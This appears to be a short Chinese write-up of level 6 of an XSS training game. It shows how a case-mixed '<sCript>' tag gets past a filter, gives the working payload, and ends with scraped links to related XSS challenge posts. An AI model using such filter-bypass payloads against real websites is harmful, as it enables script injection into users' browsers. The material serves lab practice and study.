第六关未过滤大小写 , 使用大小写绕过

源码中,过滤了 <script> , on 事件 和一些属性 , 而后将参数拼接到 value 值

使用 htmlspecialchars() 过滤标签 , 但未重新赋值给 $str , 所以不会造成影响

此关卡并未过滤大小写 , 我们使用大小写进行绕过 payload

"> <sCript>alert(6)</script>

左侧双引号用来闭合 value属性的左双引号 , 左侧尖括号 '>' 用来闭合 input标签

<input name=keyword  value="'.$str6.'">    // 拼接前
<input name=keyword  value=""> <sCript>alert(6)</script>"> //拼接后

过关

XSS-Game level 6相关推荐

  1. Xss挑战之旅writeup

    Level_1 输入点在url中,反射型 payload: http://118.89.167.246:2503/xss-game/level1.php?name=<script>aler ...

  2. DVWA之XSS (完整版)

    List item DVWA之XSS 文章目录 DVWA之XSS *Reflected XSS* Security Level: Low Security Level: Medium 1.双写绕过 2 ...

  3. Flash XSS 学习整理

    0x00 Flash XSS 本来想放弃的,问了大佬,还是说可以研究下...所以硬着头皮来弄了. 什么是flash xss? xss一是指执行恶意js,那flash xss呢?是因为flash有可以调 ...

  4. springboot xss

    1.xss 什么是XSS攻击? **XSS 即(Cross Site Scripting)中文名称为:跨站脚本攻击.**XSS的重点不在于跨站点,而在于脚本的执行.那么XSS的原理是: 恶意攻击者在w ...

  5. XSS-challenge

    酒逢知己饮,诗向会人吟. 环境准备 PHP study XSS-game-master 源码 level1 ① 审计代码 对参数的输入输出没有做严格过滤. ② 解题思路 直接构造 js 脚本 ?nam ...

  6. XSS-labs通关游戏

    Level 1 Palyload:name=<script>alert(/test/)</script> Level 2 Playload:keyword="> ...

  7. XSS-labs Level 19 Flash XSS

    level 19 flash xss 查看前端代码,发现访问swf的时候在传参 接下来直接访问这个链接. 这里可以看到flash里面提示sifr.js是没有定义的,这不仅仅是个图片... 需要对fla ...

  8. xss Payload

    来自某牛的网站:http://www.cnblogs.com/b1gstar/p/5783848.html Basic and advanced exploits for XSS proofs and ...

  9. xss测试工具(xsstrike基于python)

    xsstrike很强 项目地址: https://github.com/s0md3v/XSStrike 安装: git clone https://github.com/s0md3v/XSStrike ...

  10. xss绕过尖括号和双括号_xss挑战平台练习

    -------------------------XSS挑战之旅------------------------- 最近在学习xss,找到了一个xss练习平台,在线地址:http://test.xss ...

最新文章

  1. 多任务学习有用的资料
  2. 【遥感数字图像处理】实验:遥感图像显示与数据输入/输出(Erdas版)
  3. python爬虫哪个选择器好用_Python网络爬虫四大选择器用法原理总结
  4. Git创建版本库和添加文件
  5. HOOK大法实现不修改程序代码给程序添加功能
  6. php Access-Control-Allow-Origin 解决跨域问题
  7. python与队列入门
  8. 拦截导弹(CDQ分治,DP)
  9. 2016年4月11日作业
  10. 基于Android幼儿园管理系统,幼儿园管理系统
  11. MYSQL基础:mysql客户端工具
  12. Ubuntu下PDF编辑软件pdfedit
  13. ubuntu移动硬盘打不开
  14. 什么是广域网WAN?学WAN,看这篇文章就够了
  15. 夜光带你走进Jquery(十三)擅长的领域
  16. 系统全面的认识Solr
  17. python写 两只老虎.wav 音频文件
  18. windows 打印机管理机制(任务后台等待机制)
  19. 美国某超市销售数据分析
  20. uni-app服务器端搭建

热门文章

  1. SpringBoot注解分析
  2. 设计模式-策略模式(Strategy)
  3. jenkins X 和k8s CI/CD
  4. BOM(浏览器对象模型)
  5. MapReduce实现词频统计
  6. 关于创建 LINQ to SQL 类时无法转换复数的问题(zhuan)
  7. WTL -- 常用功能
  8. AndroidStudio安卓原生开发_UI控件_SeekBar_ProgressBar_DataPicker---Android原生开发工作笔记99
  9. mysql数据库导入导出_windows系统以及linux系统下的操作---linux工作笔记042
  10. Sentinel降级_异常比例_分布式系统集群限流_线程数隔离_削峰填谷_流量控制_速率控制_服务熔断_服务降级---微服务升级_SpringCloud Alibaba工作笔记0040